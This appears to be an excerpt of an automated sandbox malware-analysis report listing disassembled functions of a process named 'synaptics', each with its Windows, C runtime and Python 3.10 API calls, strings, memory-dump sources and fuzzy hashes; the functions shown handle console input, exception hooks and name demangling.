                                                                                                                                                                                                      • GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?), ref: 6C4F2EF1
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2F08
                                                                                                                                                                                                      • clearerr.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?), ref: 6C4F2FE4
                                                                                                                                                                                                        • Part of subcall function 6C439E30: GetConsoleMode.KERNEL32(?,!/Ol,J4Ol,?,6C4F2F21), ref: 6C439E43
                                                                                                                                                                                                        • Part of subcall function 6C439E30: GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,6C4F2F21), ref: 6C439E52
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,J4Ol,000000FF,00000000,00000000), ref: 6C4F2F37
                                                                                                                                                                                                      • PyMem_RawMalloc.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,J4Ol), ref: 6C4F2F4D
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,J4Ol,000000FF,00000000,?), ref: 6C4F2F6E
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4F2F7C
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F2F86
                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,00000000,-00000001,?,00000000), ref: 6C4F2F9F
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C6FC0FC,J4Ol), ref: 6C4F2FC5
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4F2FD5
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F2FDB
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000,?,6C4F344A,00000000,?,?), ref: 6C4F300B
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C6FC0FC,J4Ol,?,?,6C4F344A,00000000,?,?), ref: 6C4F3023
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,6C4F344A,00000000,?,?), ref: 6C4F3033
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F3039
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input line too long), ref: 6C4F30AC
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON310 ref: 6C4F30B4
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F30FE
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F310A
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F3114
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F3120
                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F314B
                                                                                                                                                                                                      • clearerr.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F315B
                                                                                                                                                                                                      • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A), ref: 6C4F316A
                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A), ref: 6C4F317B
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A), ref: 6C4F3187
                                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(00000000,0000000A,00000000), ref: 6C4F319F
                                                                                                                                                                                                      • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4F31BE
                                                                                                                                                                                                      • PyErr_CheckSignals.PYTHON310 ref: 6C4F31F9
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON310 ref: 6C4F3200
                                                                                                                                                                                                      • ResetEvent.KERNEL32(00000000), ref: 6C4F323A
                                                                                                                                                                                                      • _PyOS_InterruptOccurred.PYTHON310(00000000), ref: 6C4F3243
                                                                                                                                                                                                      • clearerr.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4F326E
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F32DE
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON310(?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F32E6
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyEval_RestoreThread,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F330D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func$Consolefflush$_set_thread_local_invalid_parameter_handler$Err_Eval_SaveThread_fileno_get_osfhandleclearerr$ByteCharEventsInputModeMultiNumberWide_errno$CheckErrorError_EventFatalInterruptLastMallocMem_MemoryObjectOccurredResetSignalsSingleStringTstateWaitWritefeoffgets
                                                                                                                                                                                                      • String ID: bJl@bJl$J4Ol$PyEval_RestoreThread$input line too long
                                                                                                                                                                                                      • API String ID: 4232353398-138935691
                                                                                                                                                                                                      • Opcode ID: 6f955a6294ad35c84681cb405cff72a0c64603a2c9c255d2f8e4c17ed6ce307d
                                                                                                                                                                                                      • Instruction ID: 4442c4f3b8054aee19802aa651b86d5f1f591143cf4b9377550b037a0a6712cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f955a6294ad35c84681cb405cff72a0c64603a2c9c255d2f8e4c17ed6ce307d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14C1D5716002009FDB00EF68DC49F6A7BB4AF8231AF154539F82597791DB31EA1ACB97
                                                                                                                                                                                                      Function 6C4F2A80 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 468threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ReadConsoleW.KERNEL32(?,?,?,?,00000000,?,?,74F770B0), ref: 6C4F2AE5
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C4F2AFC
                                                                                                                                                                                                      • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C771ED8,?,?,?,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C4F2B7F
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C4F2BEB
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON310(?,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C4F2BF3
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,?,74F770B0), ref: 6C4F2C2D
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON310(00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C4F2C35
                                                                                                                                                                                                      • PyErr_SetExcFromWindowsErrWithFilename.PYTHON310(00000000,00000000,?,?,74F770B0), ref: 6C4F2DA3
                                                                                                                                                                                                        • Part of subcall function 6C5666C0: PyUnicode_DecodeFSDefaultAndSize.PYTHON310(?,?,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000,?,?,74F770B0), ref: 6C5666E2
                                                                                                                                                                                                        • Part of subcall function 6C5666C0: PyErr_SetExcFromWindowsErrWithFilenameObjects.PYTHON310(?,?,00000000,00000000,?,?,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000,?,?,74F770B0), ref: 6C5666F0
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyEval_RestoreThread,?,?,74F770B0), ref: 6C4F2DE2
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyEval_SaveThread,PyEval_RestoreThread,?,?,74F770B0), ref: 6C4F2DEC
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000,?,6C4F344A,00000000,?,?), ref: 6C4F2E4A
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E58
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E75
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E89
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E90
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E9A
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2EAA
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2EB2
                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?), ref: 6C4F2EDD
                                                                                                                                                                                                      • GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?), ref: 6C4F2EF1
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2F08
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,J4Ol,000000FF,00000000,00000000), ref: 6C4F2F37
                                                                                                                                                                                                      • PyMem_RawMalloc.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,J4Ol), ref: 6C4F2F4D
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,J4Ol,000000FF,00000000,?), ref: 6C4F2F6E
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4F2F7C
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4F2F86
                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,00000000,-00000001,?,00000000), ref: 6C4F2F9F
                                                                                                                                                                                                      • clearerr.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?), ref: 6C4F2FE4
                                                                                                                                                                                                        • Part of subcall function 6C548C00: EnterCriticalSection.KERNEL32(6C77B0DC,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C2C
                                                                                                                                                                                                        • Part of subcall function 6C548C00: ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C48
                                                                                                                                                                                                        • Part of subcall function 6C548C00: LeaveCriticalSection.KERNEL32(6C77B0DC,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C61
                                                                                                                                                                                                        • Part of subcall function 6C548C00: EnterCriticalSection.KERNEL32(6C77B0FC,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C79
                                                                                                                                                                                                        • Part of subcall function 6C548C00: LeaveCriticalSection.KERNEL32(6C77B0FC,?,?,?,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C98
                                                                                                                                                                                                        • Part of subcall function 6C548C00: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CA1
                                                                                                                                                                                                        • Part of subcall function 6C548C00: EnterCriticalSection.KERNEL32(6C77B0FC,?,?,?,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CAB
                                                                                                                                                                                                        • Part of subcall function 6C548C00: LeaveCriticalSection.KERNEL32(6C77B0FC,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CC9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$ConsoleErr_$EnterLeave__acrt_iob_func$ByteCharError_Eval_FatalFilenameFromMemoryMultiSaveThreadTstateWideWindowsWith_fileno_get_osfhandle_set_thread_local_invalid_parameter_handlerfflush$DecodeDefaultErrorEventsInputLastMallocMem_ModeNumberObjectObjectsReadReleaseSemaphoreSingleSizeUnicode_WaitWriteclearerrwcscpy_s
                                                                                                                                                                                                      • String ID: bJl@bJl$J4Ol$PyEval_RestoreThread$PyEval_SaveThread
                                                                                                                                                                                                      • API String ID: 1435133814-549569235
                                                                                                                                                                                                      • Opcode ID: 9f481ec68f1ee9fbdace5feb4f67411ee84822fff499cdae8619f776691b2f92
                                                                                                                                                                                                      • Instruction ID: 99dddb8097284a2648a4f279c3d7a3a56d7565312da5987389c9e53853b8eab8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f481ec68f1ee9fbdace5feb4f67411ee84822fff499cdae8619f776691b2f92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9E120716002419BEB20EF28CC49F5A7BB4AFC1319F14453DF9659B790DB30E91ACBA6
                                                                                                                                                                                                      Function 73A89721 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                                                                                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                      • API String ID: 1464150960-1388207849
                                                                                                                                                                                                      • Opcode ID: 6905affa4975564c544567c6a8526ba7709118adc39f45949d40ccfa2f2b4f39
                                                                                                                                                                                                      • Instruction ID: 7f210c367d8e8f05f532145e013dd211cf62c427678a3863df1b394359318e36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6905affa4975564c544567c6a8526ba7709118adc39f45949d40ccfa2f2b4f39
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FD14CB5D0420A9FDB07CF95C586BEEBBB8AB08300F10815FD556A729CD735A606CFA1
                                                                                                                                                                                                      Function 6C5AFC10 Relevance: 65.2, APIs: 28, Strings: 9, Instructions: 413COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Py_Exit.PYTHON310(6C5AFFC6,?,?,6C5AFFC6), ref: 6C5AFC2D
                                                                                                                                                                                                      • _Py_HandleSystemExit.PYTHON310(6C5AFFC6,?,6C5AFFC6), ref: 6C5AFC1A
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: PyErr_GivenExceptionMatches.PYTHON310(?,6C73DA58), ref: 6C5AFA8D
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000000,?), ref: 6C5AFACE
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5AFAD4
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: _PyUnicode_FromId.PYTHON310(6C74E150), ref: 6C5AFB04
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: PyObject_GetAttr.PYTHON310(?,00000000), ref: 6C5AFB12
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: PyLong_AsLong.PYTHON310(?), ref: 6C5AFB52
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C5AFBD9
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: _PyErr_Clear.PYTHON310(?,?,?,?,?), ref: 6C5AFBE4
                                                                                                                                                                                                      • _Py_HandleSystemExit.PYTHON310(?,00000000,00000000,?), ref: 6C5AFC64
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,?,?,?,?), ref: 6C5AFCBA
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E100), ref: 6C5AFD21
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,?,?,?,?,?,?,00000000), ref: 6C5AFD38
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,00000000), ref: 6C5AFD49
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Exit$ClearExceptionFromHandleSystemUnicode_$AttrDict_GivenItemLongLong_MatchesNormalizeObject_Restore__acrt_iob_funcfflush
                                                                                                                                                                                                      • String ID: Original exception was:$%R returned NULL without setting an exception$%R returned a result with an exception set$0tl$@Btl$Error in sys.excepthook:$OOOO$in audit hook$sys.excepthook
                                                                                                                                                                                                      • API String ID: 687290995-3142651271
                                                                                                                                                                                                      • Opcode ID: 5cad005ed99e3c900d6f6144f44ab67e3adfd64153cb81226fe386e77806db2d
                                                                                                                                                                                                      • Instruction ID: 4f0edd0abfd29aba6c1acfec10bb6c90f6944b23238070c36e8193266be33707
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cad005ed99e3c900d6f6144f44ab67e3adfd64153cb81226fe386e77806db2d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E1A2B15043019FD710DFA5DD41E5B77E8AF84328F140A29F85997B62E731ED06CBA2
                                                                                                                                                                                                      Function 6C5AFC40 Relevance: 63.4, APIs: 26, Strings: 10, Instructions: 384COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_HandleSystemExit.PYTHON310(?,00000000,00000000,?), ref: 6C5AFC64
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: PyErr_GivenExceptionMatches.PYTHON310(?,6C73DA58), ref: 6C5AFA8D
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000000,?), ref: 6C5AFACE
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5AFAD4
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: _PyUnicode_FromId.PYTHON310(6C74E150), ref: 6C5AFB04
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: PyObject_GetAttr.PYTHON310(?,00000000), ref: 6C5AFB12
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: PyLong_AsLong.PYTHON310(?), ref: 6C5AFB52
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C5AFBD9
                                                                                                                                                                                                        • Part of subcall function 6C5AFA60: _PyErr_Clear.PYTHON310(?,?,?,?,?), ref: 6C5AFBE4
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,?,?,?,?), ref: 6C5AFCBA
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E100), ref: 6C5AFD21
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,?,?,?,?,?,?,00000000), ref: 6C5AFD38
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,00000000), ref: 6C5AFD49
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BFE8,__traceback__ must be a traceback or None,?,?,?,?,?), ref: 6C5AFD81
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E170,?,?,?,?,?,?,00000000), ref: 6C5AFD9F
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E120,?,?,?,?,?,?,?,?,00000000), ref: 6C5AFE39
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5AFE50
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5AFE5D
                                                                                                                                                                                                      • Py_Exit.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C58ACA2), ref: 6C5B015B
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C58ACA2), ref: 6C5B0165
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
